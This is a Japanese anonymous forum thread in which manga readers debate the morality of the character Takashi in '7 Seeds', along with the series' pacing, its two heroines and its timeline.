ある意味「やらなくちゃいけない」という使命感からやってるわけでしょ。
別に好きで殺し合いさせてるわけじゃなくて、必要だからやってるわけじゃない。
人類の未来のために(それが傍から見て正しいかどうかは別として)。
戦争と同じでしょ。その点では、軍人とそう代わりないと思うけど。

娘を未来に送った(恋人も一緒に)っていうのも、結局は悲惨な未来が
待ち受けてるかもしれないんだし。そのまま死んだ方が幸せだった、ってことも
十分に考えられる。でもあえて、殺し合いをさせた子どもたちと同じところに
送ったっていうのは「自分の利益のため」とは思えないなあ。
ここ読んであんまりにも貴士バッシングされているのでビックリしました。

548 :花と名無しさん:2006/11/25(土) 09:19:41 ID:???O
>>543の言うような徹底した邪悪だったら、好きになれるかもな。
奴は中途半端な上に想像力が足りないところがどうもね。
・仕事に私情を混ぜて安居と涼に致命的な口撃。
・本人たちの意志を無視して娘とその恋人を未来へ。
・でも自分は行く気なしで娘放りっ放し。
自分的にはこれでアウト。

549 :花と名無しさん :2006/11/25(土) 09:51:53 ID:???0
>・本人たちの意志を無視して娘とその恋人を未来へ。
種達は全員そうだよ〜。
みんな自分の意志とは無関係に未来に放り出されたわけで。

貴士は頭はいいけど感覚が微妙にズレてるから、花を未来に送ったのも愛情かどうかも怪しいと、自分は思っている。




550 :花と名無しさん:2006/11/25(土) 12:50:32 ID:???O
貴士は花が夏Aに素性がばれる可能性は考えてないんじゃないか。
夏AにとってはいつがXデーか知らされないまま眠らされたら目の前の同い年の人が大学生だった
教官の娘とは感覚的に思いつかないはず。普通なら。
どのみち浅慮で姑息だけどね。

551 :花と名無しさん:2006/11/25(土) 14:09:29 ID:???0
貴士は要が死神として夏Bに入って未来へ行くと思っていたんだから
いざとなったら要が花を守ってくれると当て込んでいるのでは?
花のいる春チームより夏Bの九州北の方が地理的にも目覚める時期からも
夏Aに近いだろうし。
自分の妻に惚れてる要に妻似の花の養育を任せたのも
要に花への愛情を生まれさせる為かもしれないし。
自分は花に対して厳しく接する事が出来ないから、と言っていたけど
要も花に厳しかったようには見えないし父である貴士が教育しても良かった訳で。

552 :花と名無しさん:2006/11/25(土) 14:31:15 ID:???0
花のことはとりあえず置いておいて、
貴士先生が夏Aに対して罪悪感を欠片も抱いてないとこが嫌だ。
夏Aにしたことを花には出来ないといいながらそれは単に花が可愛いからで、
夏Aへの罪悪感ではないよね。
ちょっとは反省して死んでほしいよ。

553 :花と名無しさん:2006/11/25(土) 15:06:26 ID:???0
貴士に関しては全容がでるまで評価保留。
夏Aに対しては厳しすぎたとは思うが、人類の生存のために汚れ役を引き受けたのかも知れない。
あそこまで冷徹に出来るにはそれなりの何かがないとありえないと思うし。
いや現実になら単なる殺人狂でサディストもいるかも知れないが、田村さんがそんなキャラをヒロインの父親に
持ってきて、あまりにあからさまにそれを描くとは思えん。
もし、貴士がそんなつまらんキャラだったら、かえって(演技にしても)悩んでるシーンなんかを描くような
気もするし。あと、種たちの前では偽善ぶるとか、そんな小ざかしいことをしそうだし。

554 :花と名無しさん:2006/11/25(土) 16:31:07 ID:???0
長レスやめれ。

555 :花と名無しさん:2006/11/25(土) 17:32:33 ID:???O
貴士の価値観ではやっぱり死ぬよりは少しでも生き延びる可能性がある方が幸せだから、夏Aに辛
く当たり花には愛情あって行かせた、と考えるのが妥当じゃないかなあ。
どんなに辛くても閉鎖されたシェルターで一生を送るよりは未来のふりだしに戻った環境で、と。
筋が通らなくてもかまいません、子供には罪はないよね?と開き直ってそうw

556 :花と名無しさん:2006/11/25(土) 19:07:21 ID:???0
>>547
好きで殺し合いなんかさせてないのは当たり前。貴士のやってることって
快楽殺人ではなく、利己的殺人なんかだから、余計タチが悪い。

人類の未来のためにやってるって言い切るのも、怪しいですなあ。
そもそも動機はなんであれ、個人的な感情と権限を使って娘を未来に送った
(恋人付き)時点で、公僕たる軍人と同列には並べられないと思いますね。
要するに、一定の人間の命を左右できるプチ独裁者。
まして、その命を左右された当人の夏Aにしてみれば、その行動は
許しがたいんじゃないですか?
同じ被害者でも、何も知らなかった夏Aやシェルターの人間は、
自分の意思で赤の王=四道ラインに反抗した民衆とは全然違いますよ。

557 :花と名無しさん:2006/11/25(土) 19:13:05 ID:???0
要はアホなりに真剣に未来を生き延びられる人間を育てようとしていたけど
貴士はあくまで計画を知って脅しに近い形で教師として参加してるからちょっと立場が違う

余命宣告されている自分と対照的に未来で生きられる権利が与えられる人間を見ていて
じゃあ自分の娘も権利があるだろうと無理やり送り込んだ印象だから

558 :花と名無しさん:2006/11/25(土) 19:18:32 ID:???0
それも貴士の勝手な脳内論理だけどね。
同じく余命宣告されてる他のプロジェクト員にも
子供がいる人間はいくらでもいたろうに。

559 :花と名無しさん:2006/11/25(土) 20:07:15 ID:???0
そもそも夏A候補生達は自分の意志で未来に行きたいって思ったんじゃないだろうしね。
生まれる前に既に決められていて、生まれてからも拒否権はないわけだし。
ほぼ洗脳されて育ったようなもんだ。
それをラッキーな子供だから憎いって・・・なんだそれ、と。
ラッキーの基準も、何もかもが勝手すぎ。

560 :花と名無しさん:2006/11/25(土) 20:17:48 ID:???0
>ラッキーな子供だから憎いって・・・なんだそれ、と。

そういやそうですね。気がつかなかったw
自分で作って、自分で勝手に憎くなってきて、自分で壊す。
まさにマッチポンプ(違うか)。
うーん、>>547さん、やっぱ貴士は弁護しようのない邪悪だわ。

561 :花と名無しさん:2006/11/25(土) 20:24:38 ID:???0
それでもまだ、行為自体は人類のためだったと強弁できるかもしれないが、
自分の娘を私情でチームに入れた段階で、貴士は組織の歯車に過ぎなかったって
弁護は不能。
花を未来に送ることが、彼女にとって幸福か不幸か、貴士がどちらの考えで
送り出したかわからないが、そんな動機はまったく関係ないしね。

562 :花と名無しさん:2006/11/25(土) 20:30:08 ID:???O
貴士のキャラについては話的に相当破綻してるような。憎いといったのは自分の子含めた子どもみ
んなが死んでしまうからと思いきや、次の回では事もなげに「この子も行かせようと思う」って…
ハァ?だよ。物語としておかしいのか彼のキャラが異常なのか区別がつかない。

563 :花と名無しさん:2006/11/26(日) 01:05:22 ID:???0
そんなの答えは簡単。
どこまでも自分の子供だけは 特 別 なんだよ
それこそが究極のエゴイスト男の本領。

きっと娘のためなら何人死人を出しても構わない(実験材料)ってことを
今のシェルター編で見せようとしてる気がする。

564 :花と名無しさん:2006/11/26(日) 08:42:18 ID:???0
でも、そういう人間を計画に引き込んだのは要。
もっとも自分の娘を行かせる、そして美帆がそれを承諾したのは
想定外だったみたいだけど。

565 :花と名無しさん:2006/11/26(日) 12:04:25 ID:???O
今の貴士はこれでは悲惨な最期を迎えるだろうと薄々わかりつつ計画に参加せざるをえない立場の
人間だと思う。本当は隕石が落ちたときに死にたかったんじゃないか。

566 :花と名無しさん:2006/11/26(日) 14:17:59 ID:???0
美帆さんが地上に残って、貴士だけシェルターっていうのが良いかも。

567 :花と名無しさん:2006/11/26(日) 14:22:40 ID:???0
美帆さん何らかの事情ですでに死んでるんじゃね?

568 :花と名無しさん:2006/11/26(日) 15:06:15 ID:???0
花を送ったのが愛情だとは思えないな
何年間も大事に育てて、この子だけは死なせたくないっていうのじゃなく
生まれた段階で「行かせようと思う」、なんだもん
ただのエゴでしょ、美帆さんもよく承知したなぁ

569 :花と名無しさん:2006/11/26(日) 15:07:49 ID:???0
なんかコミクス派の私にはよく理解できない展開だな・・・
今貴士先生の話やってんの?

570 :花と名無しさん:2006/11/26(日) 15:09:22 ID:???0
美帆さんも実はケッコウな悪女とみた。
悪女っていうか、愛のためなら世界が滅びても構わないってタイプかも。

571 :花と名無しさん:2006/11/26(日) 15:37:29 ID:???O
>>569 ある意味そう。
花を送り出した貴士が絡んだ、別計画の話。

572 :花と名無しさん:2006/11/26(日) 15:45:00 ID:???0
貴士先生の「悪」って言い換えれば、「人間臭さ」なんだと思う。

573 :花と名無しさん:2006/11/26(日) 15:48:06 ID:???0
随分と邪悪な人間くささだな。
愛する者のためなら邪悪になれるのもまた人間、とも言えるかもしれんけど。

…ウワ、ハズカシイコトイッチャッタ 



574 :花と名無しさん:2006/11/26(日) 17:45:09 ID:???O
要でさえ見られた自分の信念に対する揺らぎが貴士にはほとんど見られないから、人間臭いというのには異論があるなあ。

575 :花と名無しさん:2006/11/26(日) 21:32:16 ID:???O
タカシの愛情はミホのみに注がれてる印象
ハナはカナメからの愛情しか注がれてないとか
親が子供だけ生き残らせたいってのは子供には可哀相だな

576 :花と名無しさん:2006/11/26(日) 21:44:47 ID:???0
貴士の花に対する愛情は
美帆の遺伝子を受け継いで、美帆の体から出てきたから
美帆の付属物として愛してる って感じがする

577 :花と名無しさん:2006/11/26(日) 22:10:08 ID:???O
反対に、できるだけ未練を残さないよう娘と満足なコミュニケーションを
犠牲にしてでも恋人と生き残らせてあげることが愛情だと思ってるのかも。
そう思うこと自体は間違いじゃないんだけと、大勢の生徒をあの手この手
で陥れた後だからねえ。

578 :花と名無しさん:2006/11/27(月) 11:29:03 ID:???0
夏Aの最終試験のときに、貴士が
「君たちは未来で生きて行けるが、生まれてくる自分の子供は
そうではない、だから君たちが憎いのかもしれない」って言ってて、
そう考えると夏Aに残酷な試練を課す貴士の気持ちも
多少は理解できたんだけど・・・

そう言いながら生まれた子供をちゃっかりと未来に送ったところで
一気に萎えた。
何だったんだあれは。

579 :花と名無しさん:2006/11/27(月) 12:52:49 ID:???0
やっと読んだ。読みきりもかなりの分量だしタムさんお疲れさまって感じだな。

580 :花と名無しさん:2006/11/27(月) 15:38:13 ID:???O
>>578
貴士が要以上に叩かれてるのはそういう筋の通ってないとこが一番の理由だと思う。

581 :花と名無しさん:2006/11/27(月) 16:25:40 ID:???O
セブンシーズのコミクス表紙みたとき、BASARAの菊ちゃんの話かとオモタ

582 :花と名無しさん:2006/11/27(月) 17:37:07 ID:???0
ナツ(初期)と菊ちゃんって確かに黒髪の短めの髪の毛(ボブっていうのかな?)で、
似てることは、似てるかもしれないけれど、明るさが全然違うよねー

そんなこと言っても、菊ちゃんも白の軍にいたときは、蘭丸・梅若コンビにいじめられたりしてて、
そのころは、暗かったのかもしれないし、ナツだって、今はだいぶ明るくなってきてるけど

って、一巻しか読んでなかったら、ネタバレだね。

583 :花と名無しさん:2006/11/27(月) 18:40:10 ID:???O
他の主人公が出るかわからなかった初期の頃はナツの暗さが焦れったかっただろうな。
蝉も嫌な奴だったし。その頃は嵐の好青年ぶりはほっとしたんじゃないかと。
私は春チーム登場から読み出したんでわからないけど。

584 :花と名無しさん:2006/11/27(月) 19:27:01 ID:???0
蝉といえば初登場が今だったら叩かれたかもなー
いじめっ子キャラだからw

585 :花と名無しさん:2006/11/27(月) 21:32:25 ID:???0
そういえば初期の夏Bしか出てない頃は嵐がかなり好印象だったな。
花なんて生きて登場すると思わなかったし。しかも主役級で。
死んでもう会えないと知って→絶望→仲間(ナツ、蝉丸)に支えられ立ち直る
って話だとばっかり・・・
今の話もそれはそれで面白いけど、上記の話みたいなのも見たかった気がする。

586 :花と名無しさん:2006/11/27(月) 22:27:33 ID:???O
今の嵐はとりあえず花が死んでるかもって怖い考えを頭の隅に追いやることで立ち直ってる感じ。
ナツが美鶴くらい美人で積極的だったら傾いたかな?花の方も運良くというか都合良くというか積
極的じゃない男性二人がついてくれてるよな…。

587 :花と名無しさん:2006/11/27(月) 22:32:24 ID:???O
まあ、ナツ側の男二人もナツの成長にとっては理想的かもしれないけど。

588 :花と名無しさん:2006/11/28(火) 00:42:10 ID:???0
まあ貴士先輩の事だ。
美帆さんも龍宮の中にいるんだろう。そんでいちゃついたりするんだろう
そしてどっかの馬鹿のせいで死んだりするんだろう

589 :花と名無しさん:2006/11/28(火) 01:30:41 ID:???0
やっぱこのスレの貴士バッシングは異常だな。
そのくせ要のことはバッシングしないんだよなあ。なんか偏りすぎていて
花憎しの人達が貴士の「君たち(夏A)はラッキー」に飛びついたって感じにしか見えないよw

590 :花と名無しさん:2006/11/28(火) 01:58:36 ID:???O
話豚ぎりますが。
今月号、なんで田村さん二本立て?と不思議に思ったけど
もしや、とらじの方はだいぶ前に描いて一度没とかになってたのかな。
勘違いかもしれないが、原稿が別冊の2色刷用に描かれてるように見える…
シリーズものだから、あえて今回も同じ塗りにしてるのかもしれないけど。
<その場合はコミック対策もある?

内容はどっちも面白かったー、さすが。

591 :花と名無しさん:2006/11/28(火) 02:07:00 ID:???0
>>589
それはそれは

592 :花と名無しさん:2006/11/28(火) 03:47:34 ID:???O
>>589
んー、正直そう思ってた
単に自分が感情移入してないだけか?と思いつつ、
この話題になると何レスも長文続くからちょっとついていけなかった。

593 :花と名無しさん:2006/11/28(火) 04:56:00 ID:???0
卯波は最後まで嫌な奴で終わったか、自衛隊のおっさんは最後にチョいい役だったのに

594 :花と名無しさん:2006/11/28(火) 06:01:54 ID:???O
そもそも普通に擁護不可能なキャラだと思うけどなあ。
逆に考えると貴士擁護する人は花が好き、夏Aに思い入れなく、批判する人を単純な考え扱いする、
一方長文読むのが苦手な人が多いってことだな。

595 :花と名無しさん:2006/11/28(火) 08:28:31 ID:???0
>>593
役者さんが「俺、BASARAん時はおいしい役だったんだし、
今回も最後くらいはカッコつけさせてくれよー」と、田村監督に
ゴネたから。

596 :花と名無しさん:2006/11/28(火) 08:41:40 ID:???0
桜田w?

>>589
鷹派や、夏A派が少なからずいるのくらいわかってくれや。
花大好きな人だって、貴士擁護できるわけか?
花がこれからそのせいで辛い目に遭いかねないのに。
要は多分未来に来ててこれから接触がある。卯浪は報いを受けてる。
現時点だと、貴士だけ勝ち逃げした感がある。

597 :花と名無しさん:2006/11/28(火) 09:04:34 ID:???0
まあバレ読んだけど、貴士は…うん、まぁ、予想通り

598 :花と名無しさん:2006/11/28(火) 11:06:28 ID:???0
勝ち逃げではないよ、もう

午後以降に語ろう

599 :花と名無しさん:2006/11/28(火) 12:31:07 ID:???O
>>588そのまんまでしたな。

600 :花と名無しさん:2006/11/28(火) 12:34:39 ID:???O
何気に要が行ったのが確定したね

601 :花と名無しさん:2006/11/28(火) 13:31:29 ID:???0
たむさんここの住人だったのね…

602 :花と名無しさん:2006/11/28(火) 13:33:34 ID:???O
>>594
>長文読むのが苦手な人が多い

ヒドいよー。バカって言いたいのか。

603 :花と名無しさん:2006/11/28(火) 13:50:21 ID:???0
>>601
ここの住人って確定するようなことが書いてあったの?

604 :花と名無しさん:2006/11/28(火) 14:25:20 ID:???0
今回は腹立ったなー
やっぱり自分勝手で他人の足を引っ張るのは男だよね
ほんと、男ってのは救いがたい生き物だと思う

605 :花と名無しさん:2006/11/28(火) 14:55:10 ID:???0
ネタバレ短すぎ…
他にどっか詳しく書いてるとこってあるのかな?

606 :花と名無しさん:2006/11/28(火) 15:50:54 ID:???O
着ぐるみを着て物陰からじっと悩みを聞いてる貴士


今回はこれに尽きるな

607 :花と名無しさん:2006/11/28(火) 16:11:57 ID:???0
>>605
個人サイトとかならあるんじゃない?

608 :花と名無しさん:2006/11/28(火) 16:31:28 ID:???0
>>599
知ってて書いたんだろうし

609 :花と名無しさん:2006/11/28(火) 17:01:22 ID:???0
貴士先生って、朱理とか四道というよりも、水の鹿に近いのかも。

ああでもとにかく、貴士先生をそんなに嫌えないなあ。

それって、イコール、夏Aに愛着がないのかあ…

610 :花と名無しさん:2006/11/28(火) 19:11:57 ID:???O
今月で終わる筈ないとは予想してたけど、この分だとまだまだあと数カ月は続きそうだね。
回想が終わってもまだ、くるみの妊娠とか秋との確執ネタだし。
面白いんだけど、次々先の展開が読みたくなるから辛い。

そして、ますますナツの影が薄く…。
自分は皆好きだけど、さすがにこんなに花の周りの人物描写ばかりになってくるとなあ。

611 :花と名無しさん:2006/11/28(火) 19:46:48 ID:???0
つーか、花、さすがにここ読んでる段階では
貴士=父、美帆=母だって気付いてるだろうな
自分の母の死を他人の手記で読むのか…

612 :花と名無しさん:2006/11/28(火) 19:48:35 ID:???O
花はもうちょい髪長くなると可愛いかもね

てゆーか7種って20巻いかないで終わりそうじゃない?
今から寂しくなってきちゃったですよ


613 :花と名無しさん:2006/11/28(火) 20:53:28 ID:???0
今の話が終わるまでに12巻いきそうだし、
その後も花と嵐が再会するまでの話やら夏Aと花・百舌との絡みやら
それらの中でナツの成長やら最終的にどうなるのかで
20巻は軽く超えると思う。


614 :花と名無しさん:2006/11/28(火) 21:26:45 ID:???O
>>611
いや、気づいてないんじゃない?
マークの日記には『貴士さんの奥さん』と書いてあるだけでその名前は書いてないもん。

615 :花と名無しさん:2006/11/28(火) 21:46:13 ID:???O
>>610
田村さんにその気があるなら今からでもナツは十分挽回できるはずと思うのですよ。
大体夏Aや今の章に出てこられるわけないんだし、強烈な話がつづくと印象が薄くなるのは当たり前
だし…。問題はどうするつもりなのかわからないことなんだけど。

616 :花と名無しさん:2006/11/28(火) 21:48:54 ID:???0
極限状態に置かれた人間がパニックに陥るのはわかる
閉鎖空間にいる人間の集団心理が恐ろしいのはわかる
安全な場所にいる人間が何を言っても偽善と絵空事でしかないってわかってる
でも、一言だけ言わせてくれ



穴掘りモグラボーイズ師ね!!!!!!!

617 :花と名無しさん:2006/11/28(火) 22:14:11 ID:???0
>>615
ナツが今でも作者にとってダブルヒロインの一人であれば
現在の展開でも作者の計算通りだろうと安心して見ていられるんだけど
花の一人ヒロインを既定路線にしたい為の展開だとしたらちょっと…。


618 :花と名無しさん:2006/11/28(火) 22:19:24 ID:???0
ちょっとだけ豚切りスマソ。
>>590
画面処理の仕方が違うんじゃないかな。
7種はカラー原稿以外ほとんど手作業だけど、とらじはデジタルの割合が多い。
デジタルトーン使ってるし、背景も写真とか取り込んで加工してたりする。
最後のコマとかわかりやすい。

619 :花と名無しさん:2006/11/28(火) 22:32:24 ID:???0
>>617
因縁でがんじがらめの花と、まっさらのナツでいい対比だと思うけどなあ。

620 :花と名無しさん:2006/11/29(水) 00:29:59 ID:HRXotvGk0
管理が甘すぎたねえ。
一人一人にICチップを埋めつけて、現在位置の把握くらいしておくべきだ。
それくらいの技術はあるんだろうし。
穴掘られるってどうよ。

私は貴士先生は嫌いじゃないなあ。むしろ好きなタイプかも。
自分勝手で冷たいほうが、偽善者よりはずっと好きだからかな。
でも、眠っている花のことは考えても、夏Aのことは全く思ってもなさそうな
貴士先生と美帆さんを見て、
「あらまあ、本当に夏Aに対して冷たいなあ。
この人たちにとって、夏Aはただの仕事上の実験動物だったんだなあ。」
と思うと、ちょっと切なくなったけどね。


621 :花と名無しさん:2006/11/29(水) 00:30:47 ID:???0
ごめんなさい、あげちゃった。orz

622 :花と名無しさん:2006/11/29(水) 00:47:34 ID:???0
自分も貴士のいい人ぶらないところは結構いいと思う。
しかし夏Aのことを思うと胸が痛んで、美帆が死んでも報いだなと思ってしまう。
自分の子供特別扱いってのはやっぱりムカつくわ。

623 :花と名無しさん:2006/11/29(水) 00:50:41 ID:???O
美帆は夏Aのことを詳しく知ってたんだろうか。私は貴士も要も汚い部分は何も教えてないんじゃ
ないかと思うんだ。でないと美帆まで腹黒に見えてくるw

624 :花と名無しさん:2006/11/29(水) 01:06:31 ID:???0
ナツ?誰だっけ?覚えてないな

625 :花と名無しさん:2006/11/29(水) 01:20:16 ID:???O
そのレスもう飽きた。

626 :花と名無しさん:2006/11/29(水) 01:22:50 ID:???0
>>616
あれはもう氏んだでしょ

627 :花と名無しさん:2006/11/29(水) 02:06:10 ID:???O
>>619
同意。花サイドの背景は陰欝なのが続きすぎて疲れてきた。
かといって今のナツサイドももう少し重くなった方がいいけどねー。

628 :花と名無しさん:2006/11/29(水) 03:46:17 ID:???O
貴士は花のことを特別扱いしたわけじゃないと思う。
夏Aと花を同時に育ててあの扱いの差なんだったら同時扱いかもしれないけど、
貴士と夏Aを育てて、その結果を踏まえて学習して花をああ育てることを了承したんでしょう。
その教育方針や種メンバーに花の恋人を入れることなどを考えたのは要だし、
同時扱いという言い方は適切じゃないように思う。
この状況で、なぜ貴士が責められて要はスルーされるのか。
それに、夏Aが結果的にああいう状態になってしまうことは予想してなかったわけでしょう?
それはテスト後の夏Aメンバーを目の当たりにした要の反応でもわかることだし、
要と貴士は夏Aのためを思ってああいう訓練をしてきたんだと思う。
それが適切であったかどうかは別として。

629 :花と名無しさん:2006/11/29(水) 03:51:01 ID:???0
>>この状況で、なぜ貴士が責められて要はスルーされるのか。


要:反省した(らしき)人、もしくは失敗を踏まえて改善して(そうな)人
貴士:反省してない(っぽい)、もしくは後ろ向きに心閉ざしてる人


今の時点で、読者に明かされてる情報がこれくらいなので。

630 :花と名無しさん:2006/11/29(水) 04:09:48 ID:???0
夏Aは失敗作で踏み台かあ。花を憎んだり恨んだりしたら悪者になるし。
幸せになって欲しいなあ。



631 :花と名無しさん:2006/11/29(水) 05:48:28 ID:???0
夏Aファンってなんか決め付けるの多いな
上でも貴士擁護=花サイドファンor夏Aに関心がないと決め付けてるし
田村ファンってキャラの好き嫌いはあってもどこかそのキャラの生き方だとか価値観を客観的に評価する人が多いと思ってたけどこれじゃあリア厨とかわんね

632 :花と名無しさん:2006/11/29(水) 06:50:42 ID:???O
プランXの名前だけど、花達が見た扉の×はそこからきてるのかね

最後に貴士がつぶやいた神の門は狭いって言葉からして
選んだ人々を他のシェルターに移すってのはやっぱり表向きで
こっそり処分するって事になりそうだなあ

633 :花と名無しさん:2006/11/29(水) 07:06:12 ID:???0
夏Aにも感情移入できないが、貴士はもっと嫌い。
でも美帆が死んでようやく気分爽快。夏Aがどうこうというより、
あの何でも見通してるっていうスカした態度が気にくわなかったから。
まあ、たむさんはちゃんとやることやった奴には報いをあたえてくれるから
カタルシスがあるなあ。
でもこれで完全に貴士のリミッター外れただろうな。

634 :花と名無しさん:2006/11/29(水) 07:33:21 ID:???0
>>631
バレ解禁前の話を蒸し返すなよ。
連載中なんだから、その時点での心証で語られるのは仕方がないでしょう。
今月号でだいぶ、貴士の印象は変わる。
まあ、来月号はまたやらかしかねないわけだが……

635 :花と名無しさん:2006/11/29(水) 07:53:49 ID:???0
おひげを剃った途端、外見だけでなく性格も若返った。

636 :花と名無しさん:2006/11/29(水) 08:28:33 ID:???0
>>631
たしかにリア厨はいるね。>>633みたいにバカどもの愚挙を必死で止めて命を棄ててリカバリーしようと
した人まで「死んで気分爽快」なんていう輩もいるし。

637 :花と名無しさん:2006/11/29(水) 08:50:44 ID:???0
貴士は表に出してないだけで、夏Aがあんな風になってしまったことへの後悔は
当然あるでしょう。
だから「花も送ろうと思う」って言い出したんでしょ?
最初は奥さんと自分と娘と一緒に死ぬつもりだったのに、
夏Aをあんな風にして、自分で自分の子どもを育てて、
貴士の内面は大きく変わったんだと思う。ただ、キャラ的にそれが表に出ないだけで。
私は夏A大好きだけど貴士も好きだよ。

638 :花と名無しさん:2006/11/29(水) 08:53:08 ID:???0
>>626
そんな身も蓋もないがな(ピート)

639 :花と名無しさん:2006/11/29(水) 09:01:32 ID:???O
そもそも花憎しで貴士を叩いてるんじゃねーのって曲解レスが燃料だし、
決め付けではなく〜な人が多いって言ってみただけで。
まあ批判派も色々考えた上で批判してる人もいるし、擁護派にも色々いる。

640 :花と名無しさん:2006/11/29(水) 09:28:12 ID:???0
>>636
どっちがリア厨なんだか。
美帆というキャラクターの死と、貴士への報いとしての美穂の死を
混同しちゃってるよ。
前者は物理的なもの。後者は観念的なもの。
美帆がいかなる素晴らしい人間であろうと、貴士への報いという概念は変わらない。
美帆の行動や人格を論じるのは別問題。
同じ事象でもそれぞれ別側面の考え方は出来る。
厨でなければね。

641 :花と名無しさん:2006/11/29(水) 09:34:57 ID:???0
>>637
ごめん
<貴士は表に出してないだけで、夏Aがあんな風になってしまったことへの後悔は
当然あるでしょう。
だから「花も送ろうと思う」って言い出したんでしょ?
の部分の論理が良く分からん、花を送ることが夏Aへの贖罪になるわけ?

642 :花と名無しさん:2006/11/29(水) 09:40:09 ID:???0
貴士は結局穀雨時点では、教師としても親としても、計画に関わる者としても、微妙だった。
最終テスト前から、親しみとは程遠いキャラだったところへあれだし。
花が父を語るときも、奥歯に物が挟まったような感じだったし。
今回、夫としてまともで、素ボケ?な側面がちゃんと描かれただけで随分違う。

が、やっぱり貴士は種の未来を随分楽観視してるなあ。
チーム間のタイムラグ発生の可能性とか考えなかったのかな……?

643 :花と名無しさん:2006/11/29(水) 09:40:39 ID:???0
>>637
今月号を読んで騙されてはいけない。
貴士は絶対悪じゃないが、ある意味もっとタチの悪い相対悪だ。

644 :花と名無しさん:2006/11/29(水) 09:42:53 ID:???0
マークの「ウソが得意」というキャラからして、ライフ・イズ・ビューティフルのような
絶望かつ切ない展開になっていきそうな気が。

645 :花と名無しさん:2006/11/29(水) 10:36:57 ID:???O
穀雨ラストの貴士からは、あくまで彼なりに罪悪感は持っているらしい、ということしか読み取れ
なかったよ。夏Aの絶望がにじみ出た顔とのギャップが激しすぎて。要ほどちゃんと最後の彼らを
見ていたのかも不明だし。見送った後も本気で、生き残れたラッキーな彼らと思ってたでしょ。
美帆と共にという最後の希望も叶わなかったし、多分これから最後の夏Aみたいな形相になってく
るんじゃないかと。そこでやっと彼らの気持ち、自分のしたことを実感し直すのでは。

646 :花と名無しさん:2006/11/29(水) 11:57:24 ID:???O
夏Aには大事な人間を失っても生きる強さを求めていたのに、自分は愛する妻を失う覚悟が出来ていなかった。
貴士はそれを今回思い知ったんだろうね。
でもかえって失うものが無くなって鬼になった気がする。

花を未来に行かせたのは普通に娘が可愛いから
関係者のコネを使って、寂しがらないよう恋人まで込みでねじこんだっぽい。
どんなに他人を犠牲にしても自分の娘だけは助けたいという、人の業を感じた。

647 :花と名無しさん:2006/11/29(水) 12:27:07 ID:???O
最終テストはなんだかんだで高みの見物だったけど、今度は自分が神に試される当事者になるわけ
だな。読者は結末を知ってるけど、けっこうすごい心理描写になる気がしてきた。

648 :花と名無しさん:2006/11/29(水) 12:31:26 ID:???0
でもさ〜。貴士の話なんかそんなに引っ張らないで欲しいと思うのは私だけ?

649 :花と名無しさん:2006/11/29(水) 13:14:27 ID:???0
>>648
別に貴士の話だけじゃないじゃん。Xデーの話だろ。
滅亡モノにXデーの記述は当然。はしょったら、SFじゃなくちんけなファンタジーになる。
主役たちが踊ってる舞台がどう形成されたかには興味あるけどな。この話のメンバーもなかなか魅力的で
おもしろいと思うし。
たぶん君の場合は贔屓のチームがなかなか出てこないから不満なんだと思うけど。

650 :花と名無しさん:2006/11/29(水) 13:27:15 ID:???O
そんなに引っ張らないと思うよ。今回でもう暗いほうへ転がってるし。

651 :花と名無しさん:2006/11/29(水) 13:46:28 ID:???0
正直Xデーの話なんかどうでもいい、もう過去の事だろ
それより夏のAとBを出せ

652 :花と名無しさん:2006/11/29(水) 14:58:51 ID:???0
ぶっちゃけこの作品はSFでもなんでもなく、単なるファンタジーだろう
SFにしちゃあ設定がお粗末過ぎるからな
ファンタジーとしてとらえるしかあるまい
もしくはギャグ漫画

653 :花と名無しさん:2006/11/29(水) 14:59:21 ID:???0
>>652
またループさせる帰化?

654 :花と名無しさん:2006/11/29(水) 15:11:21 ID:???O
この場合のXデーは、「未来まで眠らされるメンバーに選ばれなかった人々にはどんな末路が待っていたのか」を示すのが目的だろ。
未来に放り出されるのと、みんなと一緒に滅亡を迎えるの、どっちが幸せか?という問題に絡んでくるエピソード。
描いたからSFだファンタジーだとジャンルが変わるわけでもないし、設定が高尚になるわけでもない。

655 :花と名無しさん:2006/11/29(水) 15:20:07 ID:???O
親のせいで子にもにょる、ってのは夏Aにとっちゃ仕方がないけど、
読者までそうだとまずいような。
今までだとそうなりがちだったので、それがなくなるくらい、
貴士には今の話で有り余る報いを受けてほしい。
だけど早く現在が読みたい。
ああ、矛盾。

656 :花と名無しさん:2006/11/29(水) 17:08:57 ID:???0
夏Bも春も主役がいない居残り組の方を見てみたいかも。何年も見てないし。

657 :花と名無しさん:2006/11/29(水) 18:37:32 ID:???0
関係者からの又聞きだけど、田村さんは自分の中では
Xデーから花たちのいる未来までの年月をはっきり決めているとのことです。
ただ、本編中でそれを明確にすることは(今んとこ)ない。だそうです。

個人的に前は200〜300年くらい経ってると思ってたが、シェルター跡の
痕跡からして、実は4、50年なんじゃないかって気がしてきた。

658 :花と名無しさん:2006/11/29(水) 18:41:52 ID:???O
まあその方がいいだろうな。SF脳の人がうるさいから。

659 :花と名無しさん:2006/11/29(水) 18:49:05 ID:Wgr0LwhOO
>>652
嫌なら読むなよ。
無理して読まなくていいよ。

660 :花と名無しさん:2006/11/29(水) 19:28:37 ID:???0
>>657
ないないw
4、50年はないよ
少なくとも1000年以上は経ってる
じゃないとあの生態系の変化はありえない。
かといって建造物とかの腐食とか風化が1000年経ってるとは思えない
まあ夢オチだな

661 :花と名無しさん:2006/11/29(水) 19:52:13 ID:???0
生態系は隕石に放射能が含まれており、その影響で短期間に突然変異したとか
言い分けすればよろし

662 :花と名無しさん:2006/11/29(水) 19:54:06 ID:???0
SFとして読めば>>660みたいな細かいツッコミ所が出てくるけど、
七種に求めているのは限界状態にいる人間のドラマなので
個人的には今のままで充分面白いと思ってる。
ただ今のところ花とナツのW主人公の意味があまりなさそうなのは
少し気にかかってるけど。

663 :花と名無しさん:2006/11/29(水) 20:04:33 ID:kGeRbuM70
所詮は少女漫画w

664 :花と名無しさん:2006/11/29(水) 20:05:20 ID:???0
ナツ&嵐&花の恋愛話なんだよ

665 :花と名無しさん:2006/11/29(水) 20:10:15 ID:???O
花ナツのどっちかが単独主人公ならこんなにはまってないな。
初期の二人はそれぞれ別方向にうざかった…

666 :花と名無しさん:2006/11/29(水) 20:17:53 ID:???O
>>664
鷹も加えてやって

667 :花と名無しさん:2006/11/29(水) 20:46:26 ID:???0
>>664
いやナツはいらないだろw
あれはただの片思いだし、三角関係に絡むほど強いキャラ持ってないし。
惜しいよな・・・タムがこれからちゃんと描く気があるならいいけど。

668 :花と名無しさん:2006/11/29(水) 20:57:57 ID:???O
貴士と美帆が
